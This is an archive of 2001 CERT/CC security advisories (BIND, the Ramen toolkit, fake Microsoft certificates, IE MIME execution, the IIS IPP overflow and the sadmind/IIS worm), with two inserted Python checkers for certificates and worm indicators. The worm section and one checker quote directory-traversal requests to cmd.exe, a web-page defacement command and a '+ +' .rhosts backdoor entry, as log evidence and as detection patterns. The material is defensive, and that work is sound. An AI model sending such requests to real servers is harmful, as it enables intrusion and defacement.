From: CERT Advisory
To: cert-advisory@cert.org
Date: Wed, 28 Feb 2001 15:21:15 -0500 (EST)
Subject: CERT Summary CS-2001-01

CERT Summary CS-2001-01

February 28, 2001

Each quarter, the CERT Coordination Center (CERT/CC) issues the CERT Summary to draw attention to the types of attacks reported to our incident response team, as well as other noteworthy incident and vulnerability information. The summary includes pointers to sources of information for dealing with the problems.
Past CERT summaries are available from:

   CERT Summaries
   http://www.cert.org/summaries/

______________________________________________________________________

Recent Activity

Since the last regularly scheduled CERT summary, issued in November 2000 (CS-2000-04), we have seen continued compromises via well-known vulnerabilities in rpc.statd and FTPD, as well as exploitations of recently discovered vulnerabilities in BIND and LPRng. Notable virus activity includes W32/Hybris and VBS/OnTheFly (Anna Kournikova).

For more current information on activity being reported to the CERT/CC, please visit the CERT/CC Current Activity page. The Current Activity page is a regularly updated summary of the most frequent, high-impact types of security incidents and vulnerabilities being reported to the CERT/CC. The information on the Current Activity page is reviewed and updated as reporting trends change.

   CERT/CC Current Activity
   http://www.cert.org/current/current_activity.html

1. Multiple Vulnerabilities in BIND

   The CERT/CC has learned of four vulnerabilities spanning multiple versions of the Internet Software Consortium's (ISC) Berkeley Internet Name Domain (BIND) server. BIND is an implementation of the Domain Name System (DNS) that is maintained by the ISC. Because the majority of name servers in operation today run BIND, these vulnerabilities present a serious threat to the Internet infrastructure. The CERT/CC has begun receiving reports of these vulnerabilities being successfully exploited. Sites are encouraged to follow the advice in CA-2001-02 to protect systems.

      CERT Advisory CA-2001-02 Multiple Vulnerabilities in BIND
      http://www.cert.org/advisories/CA-2001-02.html

2. Compromises Via Ramen Toolkit

   The CERT/CC has received reports from sites that have recovered an intruder toolkit called 'ramen' from compromised hosts. Ramen has been discussed in several public forums and the toolkit is publicly available.
   Ramen exploits known vulnerabilities in FTPD, rpc.statd, and LPRng; and it contains a mechanism to self-propagate. Over the past several months we have received multiple daily reports of sites being root compromised by the Ramen toolkit. Sites, especially those running Linux, are encouraged to review the following document:

      CERT Incident Note IN-2001-01, Widespread Compromises via "ramen" Toolkit
      http://www.cert.org/incident_notes/IN-2001-01.html

3. Input Validation Problems in LPRng

   A popular replacement software package to the BSD lpd printing service called LPRng contains at least one software defect, known as a "format string vulnerability," which may allow remote users to execute arbitrary code on vulnerable systems. Sites are encouraged to follow the advice in CA-2000-22 to protect systems.

      CERT Advisory CA-2000-22 Input Validation Problems in LPRng
      http://www.cert.org/advisories/CA-2000-22.html

4. VBS/OnTheFly (Anna Kournikova) Malicious Code

   The "VBS/OnTheFly" malicious code is a VBScript program that, when executed, sends a copy of itself as an email file attachment. On February 12, the CERT Coordination Center received a large number of reports from sites infected with VBS/OnTheFly. Several of the sites reported suffering network degradation as a result of mail traffic generated by VBS/OnTheFly. The CERT/CC has received few reports since the initial outbreak. For information on how to prevent or recover from a VBS/OnTheFly infection, please see:

      CERT Advisory CA-2001-03 VBS/OnTheFly (Anna Kournikova) Malicious Code
      http://www.cert.org/advisories/CA-2001-03.html

______________________________________________________________________

New Vulnerability Notes Database

On December 15, 2000, the CERT/CC began publishing vulnerability notes in a new format, and at a new location.
Vulnerability notes are very similar to advisories, but they may have less complete information and solutions may not be available for all the vulnerabilities described in vulnerability notes. There are currently more than 70 vulnerability notes available in the database. We will continue publishing vulnerability notes in accordance with our vulnerability disclosure policy. Vulnerability notes can be found at:

   The CERT Coordination Center Vulnerability Notes Database
   http://www.kb.cert.org/vuls/

______________________________________________________________________

What's New and Updated

Since the last CERT summary, we have published new and updated

   * Advisories
     http://www.cert.org/advisories/

   * Incident notes
     http://www.cert.org/incident_notes/

   * CERT/CC statistics
     http://www.cert.org/stats/cert_stats.html

   * Security improvement modules
     http://www.cert.org/security-improvement/

Descriptions of these documents and links to them can be found on our "What's New" page:

   What's New
   http://www.cert.org/nav/whatsnew.html

______________________________________________________________________

This document is available from:
http://www.cert.org/summaries/CS-2001-01.html

______________________________________________________________________

CERT/CC Contact Information

Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
   CERT Coordination Center
   Software Engineering Institute
   Carnegie Mellon University
   Pittsburgh PA 15213-3890
   U.S.A.

CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.

Using encryption

We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from
http://www.cert.org/CERT_PGP.key

If you prefer to use DES, please call the CERT hotline for more information.
Getting security information

CERT publications and other security information are available from our web site
http://www.cert.org/

To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message

   subscribe cert-advisory

* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.

______________________________________________________________________

NO WARRANTY

Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.

_________________________________________________________________

Conditions for use, disclaimers, and sponsorship information

Copyright (C) 2001 Carnegie Mellon University.
From: CERT Advisory
To: cert-advisory@cert.org
Date: Thu, 22 Mar 2001 18:26:04 -0500 (EST)
Subject: CERT Advisory CA-2001-04

CERT Advisory CA-2001-04 Unauthentic "Microsoft Corporation" Certificates

Original release date: March 22, 2001
Last revised: March 22, 2001
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

   * Systems whose users run code signed by Microsoft Corporation.

Overview

On January 29 and 30, 2001, VeriSign, Inc. issued two certificates to an individual fraudulently claiming to be an employee of Microsoft Corporation. Any code signed by these certificates will appear to be legitimately signed by Microsoft when, in fact, it is not. Although users who try to run code signed with these certificates will generally be presented with a warning dialog, there will not be any obvious reason to believe that the certificate is not authentic.

I. Description

Microsoft released a security bulletin on March 22, 2001, describing two certificates issued by VeriSign to an individual fraudulently claiming to be an employee of Microsoft. The full text of Microsoft's security bulletin is available from their web site at

   http://www.microsoft.com/technet/security/bulletin/MS01-017.asp

Additional information about this issue is also available from VeriSign's web site:

   http://www.verisign.com/developer/notice/authenticode/index.html

This issue presents a security risk because even a reasonably cautious user could be deceived into trusting the bogus certificates, since they appear to be from Microsoft. Once accepted, these certificates may allow an attacker to execute malicious code on the user's system.

This problem is the result of a failure by the certificate authority to correctly authenticate the recipient of a certificate. VeriSign has taken the appropriate action by revoking the certificates in question. However, this in itself is insufficient to prevent the malicious use of these certificates until a patch has been installed, because Internet Explorer does not check for such revocations automatically.

II. Impact

Anyone with the private portions of the certificates can sign code such that it appears to have originated from Microsoft Corporation. If the user approves the execution of code signed by one of the bogus certificates, it can take any action on the system with the privileges of the user who approved the execution. The fake certificates can only be used for Authenticode signing.

III. Solution

Check "Microsoft Corporation" Certificates

You can identify the fake certificates by checking the validity dates and serial numbers of the certificates. When prompted to authorize the execution of code signed by "Microsoft Corporation", press the "More Info" button to obtain additional information about the certificate used to sign the code.
The fake certificates have the following description:

   Issued to: Microsoft Corporation
   Issued by: VeriSign Commercial Software Publishers CA
   Valid from 1/29/2001 to 1/30/2002
   Serial number is 1B51 90F7 3724 399C 9254 CD42 4637 996A

   Issued to: Microsoft Corporation
   Issued by: VeriSign Commercial Software Publishers CA
   Valid from 1/30/2001 to 1/31/2002
   Serial number is 750E 40FF 97F0 47ED F556 C708 4EB1 ABFD

No legitimate certificates were issued to Microsoft between January 29 and 30, 2001. Certificates with these initial validity dates or serial numbers should not be authorized to execute code.

The certificate revocation list for the fake certificates can be found at

   http://crl.verisign.com/Class3SoftwarePublishers.crl

Apply a Patch from Your Vendor

While there do not appear to be any patches available at this time that directly address this issue, Microsoft is working on producing patches that will ensure the invalid certificates are not used.

Appendix A. - Vendor Information

Microsoft Corporation

   Microsoft has published a security bulletin describing this issue at
   http://www.microsoft.com/technet/security/bulletin/MS01-017.asp

Netscape

   Netscape takes all security and privacy issues very seriously. The Netscape browser does not allow the execution of ActiveX controls, signed or unsigned, and therefore Netscape users are not vulnerable to exploits which rely on signed ActiveX. In the unlikely event that Netscape users are presented with signed content from Microsoft requesting enhanced privileges, Netscape users can protect themselves by denying permission to any such request.
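The two rules in section III (the listed serial numbers, or a validity period starting on January 29 or 30, 2001) as a defender-side check, added here as an example; it is not code from the advisory, Microsoft or VeriSign. It parses the lines a user sees under "More Info"; the dialog strings it runs on are constructed from the advisory's descriptions, and the "legitimate" sample is hypothetical.

```python
"""Flag the fraudulent "Microsoft Corporation" certificates described in CA-2001-04.

Added example, not CERT/CC, Microsoft or VeriSign code. It applies the advisory's
two rules to the text shown in the signer "More Info" dialog: block the two
listed serial numbers, and block any VeriSign-issued Microsoft certificate whose
validity starts on 29 or 30 January 2001. Dialog texts below are constructed.
"""
import re
from dataclasses import dataclass
from datetime import date

# Serial numbers quoted in the advisory, normalised to upper-case hex without separators.
FRAUDULENT_SERIALS = {
    "1B5190F73724399C9254CD424637996A",
    "750E40FF97F047EDF556C7084EB1ABFD",
}
# No legitimate Microsoft certificate was issued on these dates (section III).
FRAUDULENT_NOT_BEFORE = {date(2001, 1, 29), date(2001, 1, 30)}
SUBJECT = "Microsoft Corporation"
ISSUER = "VeriSign Commercial Software Publishers CA"


@dataclass(frozen=True)
class CertInfo:
    issued_to: str
    issued_by: str
    valid_from: date
    valid_to: date
    serial: str  # normalised hex


def normalise_serial(text):
    """'1B51 90F7 ...', '1b:51:...' and '1b5190f7...' must compare equal."""
    return re.sub(r"[\s:]", "", text).upper()


def parse_us_date(text):
    """The dialog uses M/D/YYYY (1/29/2001)."""
    month, day, year = (int(p) for p in text.strip().split("/"))
    return date(year, month, day)


def parse_cert_info(text):
    """Read the four 'More Info' lines into a CertInfo; raises if one is missing."""
    fields = {}
    for line in text.strip().splitlines():
        line = line.strip()
        if m := re.match(r"Issued to:\s*(.+)", line):
            fields["issued_to"] = m.group(1).strip()
        elif m := re.match(r"Issued by:\s*(.+)", line):
            fields["issued_by"] = m.group(1).strip()
        elif m := re.match(r"Valid from\s+(\S+)\s+to\s+(\S+)", line):
            fields["valid_from"] = parse_us_date(m.group(1))
            fields["valid_to"] = parse_us_date(m.group(2))
        elif m := re.match(r"Serial number is\s*(.+)", line):
            fields["serial"] = normalise_serial(m.group(1))
    return CertInfo(**fields)


def fraud_reasons(cert):
    """Why this certificate must not be authorised to run code; empty means not flagged."""
    reasons = []
    if cert.serial in FRAUDULENT_SERIALS:
        reasons.append("serial number is one of the two revoked certificates")
    if (cert.issued_to == SUBJECT and cert.issued_by == ISSUER
            and cert.valid_from in FRAUDULENT_NOT_BEFORE):
        reasons.append("validity starts 29/30 Jan 2001, when no legitimate Microsoft certificate was issued")
    return reasons


def should_block(cert_text):
    """True when the dialog text matches either rule from the advisory."""
    return bool(fraud_reasons(parse_cert_info(cert_text)))


# Constructed dialog texts: the two fraudulent certificates from the advisory (the
# second with a differently formatted serial) and a hypothetical legitimate one.
FAKE_ONE = """
Issued to: Microsoft Corporation
Issued by: VeriSign Commercial Software Publishers CA
Valid from 1/29/2001 to 1/30/2002
Serial number is 1B51 90F7 3724 399C 9254 CD42 4637 996A
"""
FAKE_TWO = """
Issued to: Microsoft Corporation
Issued by: VeriSign Commercial Software Publishers CA
Valid from 1/30/2001 to 1/31/2002
Serial number is 750e:40ff:97f0:47ed:f556:c708:4eb1:abfd
"""
LEGIT_EXAMPLE = """
Issued to: Microsoft Corporation
Issued by: VeriSign Commercial Software Publishers CA
Valid from 6/15/2000 to 6/16/2001
Serial number is 0000 0000 0000 0000 0000 0000 0000 0001
"""
```

Call should_block() on the dialog text, or fraud_reasons(parse_cert_info(text)) to see which rule fired; both fake samples trip both rules, the hypothetical one trips neither.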
______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2001-04.html
Copyright 2001 Carnegie Mellon University.

Revision History

March 22, 2001: Initial release


From: CERT Advisory
To: cert-advisory@cert.org
Date: Tue, 3 Apr 2001 14:03:32 -0400 (EDT)
Subject: CERT Advisory CA-2001-06

CERT Advisory CA-2001-06 Automatic Execution of Embedded MIME Types

Original release date: April 03, 2001
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

   * All versions of Microsoft Internet Explorer 5.5 SP1 or earlier, except IE 5.01 SP2
   * Any software which utilizes vulnerable versions of Internet Explorer to render HTML

Overview

Microsoft Internet Explorer has a vulnerability triggered when parsing MIME parts in a document that allows a malicious agent to execute arbitrary code.
Any user or program that uses vulnerable versions of Internet Explorer to render HTML in a document (for example, when browsing a filesystem, reading email or news messages, or visiting a web page) should immediately upgrade to a non-vulnerable version of Internet Explorer.

I. Description

There exists in Internet Explorer a table which is used to determine how IE handles MIME types when it encounters MIME parts in any type of HTML document, be it email message, newsgroup posting, web page, or local file. This table contains a set of entries that cause Internet Explorer to open the MIME part without giving the end user the opportunity to decide if the MIME part should be opened.

This vulnerability allows an intruder to construct malicious content that, when viewed in Internet Explorer (or any program that uses the IE HTML rendering engine), can execute arbitrary code. It is not necessary to run an attachment; simply viewing the document in a vulnerable program is sufficient to execute arbitrary code. For more details, see Microsoft Security Bulletin MS01-020 on this topic at:

   http://www.microsoft.com/technet/security/bulletin/MS01-020.asp

There have been reports that simply previewing HTML content (as in a mail client or filesystem browser) is sufficient to trigger the vulnerability. The impact of viewing malicious code in this manner is being evaluated.

The CERT/CC is currently unaware of any reports of this vulnerability being used to successfully attack a system. Demonstration code exploiting this vulnerability has been published in several public forums.

This vulnerability is being referenced in CVE as CAN-2001-0154 and by the CERT/CC as VU#980499.

II. Impact

Attackers can cause arbitrary code to be executed on a victim's system by embedding the code in a malicious email, or news message, or web page.

III. Solution

Apply the patch from Microsoft

Apply the patch from Microsoft, available at:

   http://www.microsoft.com/windows/ie/download/critical/Q290108/default.asp

As noted in the 'Caveats' section of the Microsoft advisory, end users must apply this patch to supported versions of Microsoft's browser. This means IE must be upgraded to IE 5.01 Service Pack 1 or IE 5.5 Service Pack 1 before users can apply this patch. Users who have not previously upgraded will incorrectly receive a message stating that they do not need to apply this patch, even though they are vulnerable. Users are advised to upgrade to IE 5.5 SP1, IE 5.01 SP1 or SP2 (which has this patch incorporated in it) and apply the appropriate patch.

An excerpt from MS01-020:

   Caveats: If the patch is installed on a system running a version of IE other than the one it is designed for, an error message will be displayed saying that the patch is not needed. This message is incorrect, and customers who see this message should upgrade to a supported version of IE and re-install the patches.

Appendix A. - Vendor Information

This appendix contains information provided by vendors for this advisory. When vendors report new information to the CERT/CC, we update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments.

Cyrusoft International, Inc.

   Mulberry does not use Internet Explorer to render HTML within Mulberry itself and is not vulnerable to these kinds of problems. Users can save HTML attachments to disk and then view those in browsers susceptible to this problem, but this requires the direct intervention of the user to explicitly save to disk - simply viewing HTML in Mulberry does not expose users to these kinds of problems. Our HTML rendering is a basic styled-text only renderer that does not execute any form of scripts. This is true on all the platforms we support: Win32, Mac OS (Classic & X), Solaris, linux.
   An official statement about this is available on our website at:
   http://www.cyrusoft.com/mulberry/htmlsecurity.html

Lotus Development Corporation

   Notes does not use IE to render HTML-formatted mail messages.

Microsoft Corporation

   Please see the advisory (MS01-020, "Incorrect MIME Header Can Cause IE to Execute E-mail Attachment") related to this issue at:
   http://www.microsoft.com/technet/security/bulletin/MS01-020.asp

   A patch is available for this issue at:
   http://www.microsoft.com/windows/ie/download/critical/Q290108/default.asp

Netscape Communications Corporation

   Netscape is currently investigating the impact this vulnerability, if any, has on users of the Netscape browser.

Opera Software

   Opera does not use Internet Explorer or any other external software to render HTML.

QUALCOMM Incorporated

   It is unclear at this time what impact, if any, this vulnerability has on Eudora clients.

Appendix B. - References

   1. Havrilla, J., and Hernan, S., "CERT Vulnerability Note VU#980499: Certain MIME types can cause Internet Explorer to execute arbitrary code when rendering HTML", March 2001.
      https://www.kb.cert.org/vuls/id/980499

_________________________________________________________________

Microsoft has acknowledged Juan Carlos Cuartango for bringing this issue to their attention.

This document was written by Jeffrey S. Havrilla and Shawn V. Hernan. If you have feedback, comments, or additional information about this issue, please send us email.

______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2001-06.html

Copyright 2001 Carnegie Mellon University.
Revision History

April 03, 2001: Initial release


From: CERT Advisory
To: cert-advisory@cert.org
Date: Wed, 2 May 2001 18:24:16 -0400 (EDT)
Subject: CERT Advisory CA-2001-10

CERT Advisory CA-2001-10 Buffer Overflow Vulnerability in Microsoft IIS 5.0

Original release date: May 02, 2001
Last revised: --
Source: CERT/CC

A complete revision history is at the end of this file.

Systems Affected

   * Systems running Microsoft Windows 2000 with IIS 5.0 enabled

Overview

A vulnerability exists in Microsoft IIS 5.0 running on Windows 2000 that allows a remote intruder to run arbitrary code on the victim machine, allowing them to gain complete administrative control of the machine. A proof-of-concept exploit is publicly available for this vulnerability, which increases the urgency that system administrators apply the patch.

I. Description

Windows 2000 includes support for the Internet Printing Protocol (IPP) via an ISAPI extension.
According to Microsoft, this extension is installed by default on all Windows 2000 systems, but it is only accessible through IIS 5.0. The IPP extension contains a buffer overflow that could be used by an attacker to execute arbitrary code in the Local System security context, essentially giving the attacker complete control of the system.

This vulnerability was discovered by eEye Digital Security. Microsoft has issued the following bulletin regarding this vulnerability:

   http://www.microsoft.com/technet/security/bulletin/MS01-023.asp

This vulnerability has been assigned the identifier CAN-2001-0241 by the Common Vulnerabilities and Exposures (CVE) group:

   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0241

II. Impact

Anyone who can reach a vulnerable web server can execute arbitrary code in the Local System security context, resulting in the intruder gaining complete control of the system. Note that this may be significantly more serious than a simple "web defacement."

III. Solution

Apply a patch from your vendor

A patch is available from Microsoft at

   http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29321

Additional advice on securing IIS web servers is available from

   http://www.microsoft.com/technet/security/iis5chk.asp
   http://www.microsoft.com/technet/security/tools.asp

Appendix A. Vendor Information

Microsoft Corporation

   The following documents regarding this vulnerability are available from Microsoft:
   http://www.microsoft.com/technet/security/bulletin/MS01-023.asp

References

   1. VU#516648: Microsoft Windows 2000/Internet Information Server (IIS) 5.0 Internet Printing Protocol (IPP) ISAPI contains buffer overflow, CERT/CC, 05/02/2001,
      http://www.kb.cert.org/vuls/id/516648

Authors: Chad Dougherty, Shawn Hernan.
______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2001-10.html
_________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2001 Carnegie Mellon University. Revision History May 02, 2001: Initial Release -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQCVAwUBOvCEtQYcfu8gsZJZAQG11QP+Ipbm1xOc1d0fiY6KbQefsvBVbUDKdwFk jN2mBm9BM28lniyxvP2Jhbw5vt/6vxFlYKnXF7jQvuw5VpHSPkOs+zuQamt15a0u 3rd4l2nWgRFo10vaykFPYLYjjpfW0BOz5ULkkgKwjbswDQfQQ00o9EurXDXOt276 9pPCMThcy4Q= =eVKj -----END PGP SIGNATURE----- From - Tue May 8 01:07:43 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.10.1/8.10.1) with ESMTP id f487vIN16824; Tue, 8 May 2001 00:57:18 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id BAA18554; Tue, 8 May 2001 01:06:48 -0400 (EDT) Date: Tue, 8 May 2001 01:06:48 -0400 (EDT) Received: by canaveral.red.cert.org; Tue, 8 May 2001 01:01:58 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 Subject: CERT Advisory CA-2001-11 X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: b9739b3409b7ae56683bd60b0716fbb2 Status: RO X-Status: X-Keywords: X-UID: 8 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2001-11 sadmind/IIS Worm Original release date: May 08, 2001 Last revised: -- Source: CERT/CC A complete revision history is at the end of this file. Systems Affected * Systems running unpatched versions of Microsoft IIS * Systems running unpatched versions of Solaris up to, and including, Solaris 7 Overview The CERT/CC has received reports of a new piece of self-propagating malicious code (referred to here as the sadmind/IIS worm). The worm uses two well-known vulnerabilities to compromise systems and deface web pages. I. 
Description

Based on preliminary analysis, the sadmind/IIS worm exploits a vulnerability in Solaris systems and subsequently installs software to attack Microsoft IIS web servers. In addition, it includes a component to propagate itself automatically to other vulnerable Solaris systems. It will add "+ +" to the .rhosts file in the root user's home directory. Finally, it will modify the index.html on the host Solaris system after compromising 2,000 IIS systems.

To compromise the Solaris systems, the worm takes advantage of a two-year-old buffer overflow vulnerability in the Solstice sadmind program. For more information on this vulnerability, see

http://www.kb.cert.org/vuls/id/28934
http://www.cert.org/advisories/CA-1999-16.html

After successfully compromising the Solaris systems, it uses a seven-month-old vulnerability to compromise the IIS systems. For additional information about this vulnerability, see

http://www.kb.cert.org/vuls/id/111677

Solaris systems that are successfully compromised via the worm exhibit the following characteristics:

* Sample syslog entry from compromised Solaris system

May 7 02:40:01 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Bus Error - core dumped
May 7 02:40:01 carrier.domain.com last message repeated 1 time
May 7 02:40:03 carrier.domain.com last message repeated 1 time
May 7 02:40:06 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Segmentation Fault - core dumped
May 7 02:40:08 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Hangup
May 7 02:40:08 carrier.domain.com last message repeated 1 time
May 7 02:44:14 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Killed

* A rootshell listening on TCP port 600

* Existence of the directories
  /dev/cub contains logs of compromised machines
  /dev/cuc contains tools that the worm uses to operate and propagate

* Running processes of the scripts associated with the worm, such as the following:
  /bin/sh /dev/cuc/sadmin.sh
  /dev/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 111
  /dev/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 80
  /bin/sh /dev/cuc/uniattack.sh
  /bin/sh /dev/cuc/time.sh
  /usr/sbin/inetd -s /tmp/.f
  /bin/sleep 300

Microsoft IIS servers that are successfully compromised exhibit the following characteristics:

* Modified web pages that read as follows:
  fuck USA Government
  fuck PoizonBOx
  contact:sysadmcn@yahoo.com.cn

* Sample Log from Attacked IIS Server

2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\ 200 -
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 -
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/root.exe /c+echo+<HTML code inserted here>.././index.asp 502 -

II. Impact

Solaris systems compromised by this worm are being used to scan and compromise other Solaris and IIS systems. IIS systems compromised by this worm can suffer modified web content. Intruders can use the vulnerabilities exploited by this worm to execute arbitrary code with root privileges on vulnerable Solaris systems, and arbitrary commands with the privileges of the IUSR_machinename account on vulnerable Windows systems. We are receiving reports of other activity, including one report of files being destroyed on the compromised Windows machine, rendering them unbootable. It is unclear at this time if this activity is directly related to this worm.

III.
Solutions

Apply a patch from your vendor

A patch is available from Microsoft at
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp

For IIS Version 4:
http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp

For IIS Version 5:
http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp

Additional advice on securing IIS web servers is available from
http://www.microsoft.com/technet/security/iis5chk.asp
http://www.microsoft.com/technet/security/tools.asp

Apply a patch from Sun Microsystems as described in Sun Security Bulletin #00191:
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/191&type=0&nav=sec.sba

Appendix A. Vendor Information

Microsoft Corporation
The following documents regarding this vulnerability are available from Microsoft:
http://www.microsoft.com/technet/security/bulletin/MS01-023.asp

Sun Microsystems
Sun has issued the following bulletin for this vulnerability:
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/191&type=0&nav=sec.sba

References
1. Vulnerability Note VU#111677: Microsoft IIS 4.0 / 5.0 vulnerable to directory traversal via extended unicode in url (MS00-078)
   http://www.kb.cert.org/vuls/id/111677
2. CERT Advisory CA-1999-16 Buffer Overflow in Sun Solstice AdminSuite Daemon sadmind
   http://www.cert.org/advisories/CA-1999-16.html

Authors: Chad Dougherty, Shawn Hernan, Jeff Havrilla, Jeff Carpenter, Art Manion, Ian Finlay, John Shaffer
______________________________________________________________________
This document is available from: http://www.cert.org/advisories/CA-2001-11.html
______________________________________________________________________
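The characteristics listed in Section I can be turned into a host and log sweep. The following Python script is an added example and is not CERT/CC or vendor tooling: the IIS and syslog samples it scans are the ones quoted in this advisory, while the ps, netstat and .rhosts samples are constructed from the process list, the TCP port 600 root shell and the "+ +" .rhosts entry described above.

```python
"""Host and log indicator checks for the sadmind/IIS worm, built from the
artifacts listed in CA-2001-11.  Added example; not CERT/CC or vendor code."""
import re
from typing import Dict, List, Tuple

# The first four IIS lines are the advisory's own sample; the fifth is a
# constructed benign request so the scanner has something to leave alone.
IIS_LOG = """\
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 200 -
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir+..\\ 200 -
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+\\winnt\\system32\\cmd.exe+root.exe 502 -
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/root.exe /c+echo+<HTML code inserted here>.././index.asp 502 -
2001-05-06 12:21:02 10.10.10.11 - 10.20.20.20 80 GET /default.htm - 200 -
"""

# Solaris syslog lines quoted in the advisory (inetd reporting sadmind crashes).
SYSLOG = """\
May 7 02:40:01 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Bus Error - core dumped
May 7 02:40:01 carrier.domain.com last message repeated 1 time
May 7 02:40:06 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Segmentation Fault - core dumped
May 7 02:40:08 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Hangup
May 7 02:44:14 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Killed
"""

# Constructed 'ps -ef' output built from the advisory's process list.
PS_OUTPUT = """\
    root   139     1  0 02:39:58 ?  0:00 /usr/sbin/inetd -s
    root  5234  5230  0 02:45:10 ?  0:00 /bin/sh /dev/cuc/sadmin.sh
    root  5240  5234  0 02:45:11 ?  0:01 /dev/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 111
    root  5241  5234  0 02:45:11 ?  0:01 /dev/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 80
    root  5250  5234  0 02:45:12 ?  0:00 /usr/sbin/inetd -s /tmp/.f
    root  5251  5234  0 02:45:12 ?  0:00 /bin/sleep 300
"""

# Constructed 'netstat -an' excerpt and root's .rhosts contents.
NETSTAT = """\
      *.111                *.*                0      0 24576      0 LISTEN
      *.600                *.*                0      0 24576      0 LISTEN
"""
RHOSTS = "+ +\n"

IIS_INDICATORS = [
    # Directory traversal to cmd.exe (VU#111677), in the decoded form IIS logs it
    ("traversal to cmd.exe (VU#111677)",
     re.compile(r"/scripts/(?:\.\./)+.*?winnt/system32/cmd\.exe", re.I)),
    # The copy of cmd.exe the worm drops into the scripts directory
    ("root.exe (worm's copy of cmd.exe) invoked",
     re.compile(r"/scripts/root\.exe", re.I)),
]

SADMIND_CRASH = re.compile(r"/usr/sbin/sadmind: (?:Bus Error|Segmentation Fault) - core dumped")
WORM_PROCESS = re.compile(r"/dev/cu[bc]/|/usr/sbin/inetd -s /tmp/\.f")


def scan_iis_log(text: str) -> List[Tuple[int, str]]:
    """(line number, indicator) pairs for IIS log lines matching the worm's requests."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        for label, pat in IIS_INDICATORS:
            if pat.search(line):
                hits.append((n, label))
    return hits


def count_sadmind_crashes(text: str) -> int:
    """Number of inetd reports of sadmind dumping core; a burst of these is
    what repeated overflow attempts against sadmind look like in syslog."""
    return sum(1 for line in text.splitlines() if SADMIND_CRASH.search(line))


def worm_processes(ps_text: str) -> List[str]:
    """Command lines from ps output that reference the worm's files."""
    return [line.strip() for line in ps_text.splitlines() if WORM_PROCESS.search(line)]


def listening_on(netstat_text: str, port: int) -> bool:
    """True if netstat shows a TCP listener bound to `port` on any address."""
    pat = re.compile(rf"^\s*\S+\.{port}\s+\S+\s+.*\bLISTEN\b")
    return any(pat.search(line) for line in netstat_text.splitlines())


def rhosts_wide_open(rhosts_text: str) -> bool:
    """True if .rhosts holds a '+ +' entry (any host, any user), as the worm adds for root."""
    return any(line.split() == ["+", "+"] for line in rhosts_text.splitlines())


def assess(iis=IIS_LOG, syslog=SYSLOG, ps=PS_OUTPUT, netstat=NETSTAT, rhosts=RHOSTS) -> Dict[str, object]:
    """Run every check and return one report."""
    return {
        "iis_hits": scan_iis_log(iis),
        "sadmind_crashes": count_sadmind_crashes(syslog),
        "worm_processes": worm_processes(ps),
        "rootshell_tcp_600": listening_on(netstat, 600),
        "rhosts_plus_plus": rhosts_wide_open(rhosts),
    }


if __name__ == "__main__":
    for key, value in assess().items():
        print(f"{key}: {value}")
```

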